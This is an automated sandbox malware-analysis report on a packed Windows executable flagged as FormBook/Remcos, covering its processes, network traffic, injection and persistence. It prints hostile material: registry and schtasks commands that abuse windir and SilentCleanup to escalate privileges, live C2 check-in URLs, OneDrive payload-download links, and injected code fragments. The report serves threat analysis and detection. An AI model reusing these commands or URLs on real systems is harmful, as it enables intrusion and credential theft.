Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 11, 2021, 9:22 a.m.	Aug. 11, 2021, 9:33 a.m.

Size	628.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`100c39652e8851d14fdb2a4996fa1341`
SHA256	`6b1c4ecf03e71ee2c00deb9b82e805b16adaf5e01691f7d3fd1a972087c7481a`
CRC32	`65ED44B5`
ssdeep	`12288:dImxz1vULk5s9OY9oWKD6eoOLV2CH3eVgT4N:iwJULk29OYRKDHvp2U3e84N`
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description)

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
1136
- cmd.exe cmd /c ""C:\Users\Public\Trast.bat" "
  684
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
    972
    - reg.exe reg delete hkcu\Environment /v windir /f
      2324
    - reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
      532
    - schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      2760
- cmd.exe cmd /c ""C:\Users\Public\nest.bat" "
  2452
  - reg.exe reg delete hkcu\Environment /v windir /f
    728

Name	Response	Post-Analysis Lookup
www.besport24.com	A 51.83.52.226 CNAME besport24.com	51.83.52.226
www.microwgreens.com	A 78.135.107.25	78.135.107.25
www.opticatervisof.com
www.aladinfarma.com	A 81.95.96.29	81.95.96.29
pxq5zw.sn.files.1drv.com	CNAME odc-sn-files-geo.onedrive.akadns.net CNAME sn-files.fe.1drv.com CNAME sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net A 13.107.42.12 CNAME odc-sn-files-brs.onedrive.akadns.net CNAME l-0003.l-msedge.net	13.107.42.12
www.hangrylocal.com	A 52.58.78.16	52.58.78.16
www.adenxsdesign.com	A 217.160.0.46	217.160.0.46
www.amazebrowser.com	A 37.48.65.150	199.115.115.118
www.mobiessence.com	A 52.58.78.16	52.58.78.16
www.uniamaa.com
www.riveraitc.com	CNAME shops.myshopify.com A 23.227.38.74	23.227.38.74
www.genesysshop.com	CNAME genesysshop.com A 34.102.136.180	34.102.136.180
onedrive.live.com	CNAME odc-web-geo.onedrive.akadns.net CNAME l-0004.l-msedge.net A 13.107.42.13 CNAME odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net CNAME odc-web-brs.onedrive.akadns.net	13.107.42.13
www.mylifeinpark.com	A 35.186.238.101	35.186.238.101
www.elglink99.com	A 199.59.242.153	199.59.242.153
www.ilovemehoodie.com	CNAME cadori.myshopify.com A 23.227.38.74 CNAME shops.myshopify.com	23.227.38.74

IP Address	Status	Action
172.67.188.154	Active	Moloch
13.107.42.12	Active	Moloch
13.107.42.13	Active	Moloch
164.124.101.2	Active	Moloch
199.59.242.153	Active	Moloch
217.160.0.46	Active	Moloch
23.227.38.74	Active	Moloch
34.102.136.180	Active	Moloch
35.186.238.101	Active	Moloch
37.48.65.150	Active	Moloch
51.83.52.226	Active	Moloch
52.58.78.16	Active	Moloch
78.135.107.25	Active	Moloch
81.95.96.29	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49167 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49166 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49165 -> 13.107.42.13:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49185 -> 23.227.38.74:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49185 -> 23.227.38.74:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49185 -> 23.227.38.74:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49183 -> 199.59.242.153:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49183 -> 199.59.242.153:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49183 -> 199.59.242.153:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49195 -> 78.135.107.25:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49195 -> 78.135.107.25:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49195 -> 78.135.107.25:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49189 -> 23.227.38.74:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49189 -> 23.227.38.74:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49189 -> 23.227.38.74:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49186 -> 37.48.65.150:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49186 -> 37.48.65.150:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49186 -> 37.48.65.150:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49184 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49184 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49184 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49187 -> 217.160.0.46:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49187 -> 217.160.0.46:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49187 -> 217.160.0.46:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49188 -> 51.83.52.226:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49188 -> 51.83.52.226:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49188 -> 51.83.52.226:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49196 -> 35.186.238.101:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49196 -> 35.186.238.101:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49196 -> 35.186.238.101:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49190 -> 52.58.78.16:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49190 -> 52.58.78.16:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49190 -> 52.58.78.16:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49194 -> 81.95.96.29:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49194 -> 81.95.96.29:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49194 -> 81.95.96.29:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49192 -> 52.58.78.16:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49192 -> 52.58.78.16:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49192 -> 52.58.78.16:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49167 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49
TLSv1 192.168.56.102:49166 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49
TLSv1 192.168.56.102:49165 13.107.42.13:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=onedrive.com	24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 11, 2021, 9:22 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: /min C:\Users\Public\UKO.bat console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: /min reg delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Aug. 11, 2021, 9:22 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	.....
section	......
section	....

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (12 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.elglink99.com/6mam/?rN=SLcUjScG5RnOVZMPBoDDz2hKjpXj+iqBcro/vPi5ifNBMfCnXfAsQjLgCQAIbn3ZI+l2ZT4E&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.genesysshop.com/6mam/?rN=gbNVLwi1vO2ZsTKwdijolRE+nd+f4bOFGjLO6oLWdkpAXgcu19jDQ9iXEv77aHIk6xstCEEF&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.ilovemehoodie.com/6mam/?rN=WcJFy0FDyb1eQp1HHEDezlfsnB+bgSZ9M5sCd3/XEWVbVLaHwBgyDt5AxetLVNVTX35rQb0V&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.amazebrowser.com/6mam/?rN=bdYiy4dFQ1FKdK0RHZb8AKGKI6CI94rlWbRWgupG1OIMQwt3tgAXT6Nv0jCitXCfOrToZzYc&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.adenxsdesign.com/6mam/?rN=tU44klL44EKqmodFv/jg5nrIY8m9SPufik0gg789I5xKoKlf2FGRw1yhbPhqQNhokqqERcg/&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.besport24.com/6mam/?rN=G66iPt+xvrTiSrnWMSNY3jIG1auw/RAx4P7alq3BxDAHCc2pRDbTwTzLPU1dODy6kKEhnUhc&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.riveraitc.com/6mam/?rN=SnhjisI499lOsf3YfO532EwcXneBDaw7KeLS1bDcRf/9DFIScc8FKAxpINBYBIfoUHjDmPpQ&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.hangrylocal.com/6mam/?rN=36qA+yJVADGSjIyrRZyWBcFzu3O8ymRgUV+yI2TLFgVmL4h8KOdnmVSSS6y/UW1rmq4ZtmEu&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.mobiessence.com/6mam/?rN=KE8gpfUGztMVNWKMFV5goIwNmc44LE6Oi+XDAS05rkp2RTHle1NPjBrPfhHuDJ31Wqk/Ne1S&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.aladinfarma.com/6mam/?rN=udSG7fe6GY9zo7ZKy45gsyroZuOYrS4qDm5Wf1a6lEkS7UZsR2SStIdy4f3tNkj1uIyko7Uw&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.microwgreens.com/6mam/?rN=spZCZghFvseg75dRXNIXCw7EhslI35bACWKDdbchv3V0SWgn9001kbyKAZoOQB4eJhmoZDU8&Tx=XXaL1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.mylifeinpark.com/6mam/?rN=djxA7LmKh1Tu4y37ItMqg4jKcWhO49sHA3kvexLhBIUDaV9dSBVXhkalQfoX2m3vAXrXaW3C&Tx=XXaL1

Performs some HTTP requests (15 events)

request	GET http://www.elglink99.com/6mam/?rN=SLcUjScG5RnOVZMPBoDDz2hKjpXj+iqBcro/vPi5ifNBMfCnXfAsQjLgCQAIbn3ZI+l2ZT4E&Tx=XXaL1
request	GET http://www.genesysshop.com/6mam/?rN=gbNVLwi1vO2ZsTKwdijolRE+nd+f4bOFGjLO6oLWdkpAXgcu19jDQ9iXEv77aHIk6xstCEEF&Tx=XXaL1
request	GET http://www.ilovemehoodie.com/6mam/?rN=WcJFy0FDyb1eQp1HHEDezlfsnB+bgSZ9M5sCd3/XEWVbVLaHwBgyDt5AxetLVNVTX35rQb0V&Tx=XXaL1
request	GET http://www.amazebrowser.com/6mam/?rN=bdYiy4dFQ1FKdK0RHZb8AKGKI6CI94rlWbRWgupG1OIMQwt3tgAXT6Nv0jCitXCfOrToZzYc&Tx=XXaL1
request	GET http://www.adenxsdesign.com/6mam/?rN=tU44klL44EKqmodFv/jg5nrIY8m9SPufik0gg789I5xKoKlf2FGRw1yhbPhqQNhokqqERcg/&Tx=XXaL1
request	GET http://www.besport24.com/6mam/?rN=G66iPt+xvrTiSrnWMSNY3jIG1auw/RAx4P7alq3BxDAHCc2pRDbTwTzLPU1dODy6kKEhnUhc&Tx=XXaL1
request	GET http://www.riveraitc.com/6mam/?rN=SnhjisI499lOsf3YfO532EwcXneBDaw7KeLS1bDcRf/9DFIScc8FKAxpINBYBIfoUHjDmPpQ&Tx=XXaL1
request	GET http://www.hangrylocal.com/6mam/?rN=36qA+yJVADGSjIyrRZyWBcFzu3O8ymRgUV+yI2TLFgVmL4h8KOdnmVSSS6y/UW1rmq4ZtmEu&Tx=XXaL1
request	GET http://www.mobiessence.com/6mam/?rN=KE8gpfUGztMVNWKMFV5goIwNmc44LE6Oi+XDAS05rkp2RTHle1NPjBrPfhHuDJ31Wqk/Ne1S&Tx=XXaL1
request	GET http://www.aladinfarma.com/6mam/?rN=udSG7fe6GY9zo7ZKy45gsyroZuOYrS4qDm5Wf1a6lEkS7UZsR2SStIdy4f3tNkj1uIyko7Uw&Tx=XXaL1
request	GET http://www.microwgreens.com/6mam/?rN=spZCZghFvseg75dRXNIXCw7EhslI35bACWKDdbchv3V0SWgn9001kbyKAZoOQB4eJhmoZDU8&Tx=XXaL1
request	GET http://www.mylifeinpark.com/6mam/?rN=djxA7LmKh1Tu4y37ItMqg4jKcWhO49sHA3kvexLhBIUDaV9dSBVXhkalQfoX2m3vAXrXaW3C&Tx=XXaL1
request	GET https://onedrive.live.com/download?cid=7AD84143EE0A85E3&resid=7AD84143EE0A85E3%21119&authkey=AHwDCm0rHA_Fdq0
request	GET https://pxq5zw.sn.files.1drv.com/y4mcZwEs0Fkycahq9lyprkiGjz1qGCE-GcaPdlOrH38LMa-5PibJkjvGEh-ONPJYG0qLMLL1X07PhjqnFtLNDsO9zIJxpCDz7OgzTiNDP3W77yb6ShN2X4khXphOq41piagMu1AmGUQDMn7oUZQYZVkJ4s1RQdT4WCd0cpzqqvsxM4w6UGw6RRtOx_8qrTZPyUfC4GnP_sSq0bX8uXprvPkyQ/Dxpdkclrjdrejcszbcdvtqsvfzlnpaa?download&psid=1
request	GET https://pxq5zw.sn.files.1drv.com/y4myzjDL3Z-3YxdLKyKcGO-zUi33HcVwHpWr51jFLOPEYUTb9L0MeV0Q57O01geu8Y4UdFYfK507PGXsVnoxLf8UugUWnThmtUDbATUqz_CMUCzrkNL9zh4F9yrvRfCSP3jInFCjf3azhDWQ9Qo6wPJqr8pZZ6fijXRUPyE-fC-Z2AlLUb_6LO_TW14Ae7dwaS-QceiWUVgtNTphkg30A4OIA/Dxpdkclrjdrejcszbcdvtqsvfzlnpaa?download&psid=1

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 11, 2021, 9:22 a.m.	process_identifier: 1136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e52000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 11, 2021, 9:22 a.m.	process_identifier: 1136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 11, 2021, 9:22 a.m.	process_identifier: 1136 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Creates executable files on the filesystem (5 events)

file	C:\Users\Public\Libraries\Dxpdkcl\Dxpdkcl.exe
file	C:\Users\Public\UKO.bat
file	C:\Users\Public\nest.bat
file	C:\Users\Public\Trast.bat
file	C:\Users\Public\KDECO.bat

Creates a suspicious process (2 events)

cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 11, 2021, 9:22 a.m.	process_identifier: 1136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 81920 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00561000 process_handle: 0xffffffff	1	0	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0002d000', u'virtual_address': u'0x00063000', u'entropy': 7.188854345306255, u'name': u'.....', u'virtual_size': u'0x0002cfd0'}

entropy

7.18885434531

description

A section with a high entropy has been found

entropy

0.287081339713

description

Overall entropy of this PE file is high

Yara rule detected in process memory (50 out of 60 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline	reg delete hkcu\Environment /v windir /f
cmdline	reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 6d25230b3e4927b4fad30c94eebaa72cd1cf11c5

Communicates with host for which no DNS query was performed (1 event)

host

172.67.188.154

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 11, 2021, 9:22 a.m.	process_identifier: 1260 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000560	1
NtAllocateVirtualMemory Aug. 11, 2021, 9:22 a.m.	process_identifier: 1260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000560	1
NtAllocateVirtualMemory Aug. 11, 2021, 9:22 a.m.	process_identifier: 1260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000560	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Dxpdkcl

reg_value

C:\Users\Public\Libraries\lckdpxD.url

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1136 created a remote thread in non-child process 1260
CreateRemoteThread Aug. 11, 2021, 9:22 a.m.	thread_identifier: 1796 process_identifier: 1260 function_address: 0x00100000 flags: 0 stack_size: 0 parameter: 0x000f0000 process_handle: 0x00000560	1	1384	0

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1136 manipulating memory of non-child process 1260
NtAllocateVirtualMemory Aug. 11, 2021, 9:22 a.m.	process_identifier: 1260 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000560	1	0	0
NtAllocateVirtualMemory Aug. 11, 2021, 9:22 a.m.	process_identifier: 1260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000560	1	0	0
NtAllocateVirtualMemory Aug. 11, 2021, 9:22 a.m.	process_identifier: 1260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000560	1	0	0

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1136 injected into non-child 1260
WriteProcessMemory Aug. 11, 2021, 9:22 a.m.	buffer: A`ÐB base_address: 0x000f0000 process_identifier: 1260 process_handle: 0x00000560	1	1	0
WriteProcessMemory Aug. 11, 2021, 9:22 a.m.	buffer: UìÄøEUøPUü1ÀPjÿuøÿUüYY]Â@UìÄÔSVWúðEÔô?`è5ÿÿ3ÀUh½H`dÿ0d ÆEÿG<ÇEô»Ãj@h0Eô@PPEô@4ÃPèÿÿEð}ðt0hjEðPèÿÿj@h0Eô@PPEô@4ÃPVèâÿÿEð}ðuû0vEÔPÏUðÆèEÔÀt7EèUàUìUøRUØRPEðPVèÖÿÿjjMèºG`Æè_ýÿÿÀtÆEÿ3ÀZYYdhÄH`EÔô?`èÿÿÃ base_address: 0x00100000 process_identifier: 1260 process_handle: 0x00000560	1	1	0

Network activity contains more than one unique useragent (2 events)

process	vbc.exe				useragent	zipo
process	vbc.exe				useragent	aswe

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 684 resumed a thread in remote process 972
Process injection	Process 2452 resumed a thread in remote process 728
NtResumeThread Aug. 11, 2021, 9:22 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 972	1	0	0
NtResumeThread Aug. 11, 2021, 9:22 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 728	1	0	0

Generates some ICMP traffic

File has been identified by 31 AntiVirus engines on VirusTotal as malicious (31 events)

Bkav	W32.AIDetect.malware1
Lionic	Trojan.Multi.Generic.4!c
FireEye	Generic.mg.100c39652e8851d1
McAfee	Fareit-FDBI!100C39652E88
Cylance	Unsafe
Alibaba	Backdoor:Win32/Injector.557b6444
Cyren	W32/Kryptik.EWW.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Injector.EPXQ
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Backdoor.Win32.Remcos.gen
BitDefender	Gen:Variant.Jacard.230260
Avast	Win32:Trojan-gen
DrWeb	Trojan.DownLoader41.4140
